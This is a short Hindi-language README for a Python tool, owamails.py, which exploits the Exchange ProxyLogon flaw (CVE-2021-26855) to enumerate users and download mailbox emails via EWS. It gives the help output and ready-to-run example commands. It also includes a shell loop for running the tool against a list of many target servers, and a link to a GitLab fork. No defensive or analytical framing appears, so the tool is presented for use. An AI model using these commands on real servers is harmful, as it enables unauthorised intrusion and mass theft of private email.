
CVE-2021-26855 (ProxyLogon) का शोषण करने के लिए Python टूल जो EWS के माध्यम से Exchange मेलबॉक्स ईमेल डाउनलोड करता है, उपयोगकर्ता गणना और बल्क टारगेट स्कैनिंग का समर्थन करता है।
मूल उपयोग: python owamails.py -u <url> -l <users.txt> -p <path>
वैकल्पिक तर्क:
-h, --help show this help message and exit
-u URL, --url URL Url, provide schema and not final / (eg
https://example.org)
-l LIST, --list LIST Users mailbox list
-p PATH, --path PATH Path to write emails in xml format
-f FQDN, --fqdn FQDN FQDN
-d DOMAIN, --domain DOMAIN
Domain to check mailboxes (eg if .local dont work)
ईमेल बॉक्स जाँचें और ईमेल डाउनलोड करें
मूल:
python owamails.py -u https://127.0.0.1 -l users.txt -p downloads
हेडर से डोमेन न लें:
python owamails.py -u https://127.0.0.1 -l users.txt -p downloads -d mydomain.local
हेडर से FQDN न लें:
python owamails.py -u https://127.0.0.1 -l users.txt -p downloads -f EXCH01
बड़े पैमाने पर?:
for i in $(cat targets.txt); do echo $i && python3 owamails.py -u https://$i -l users.txt -p emails; done;
संदर्भ:
फ़ॉर्क फॉर्म:
https://gitlab.com/gvillegas/ohwaa/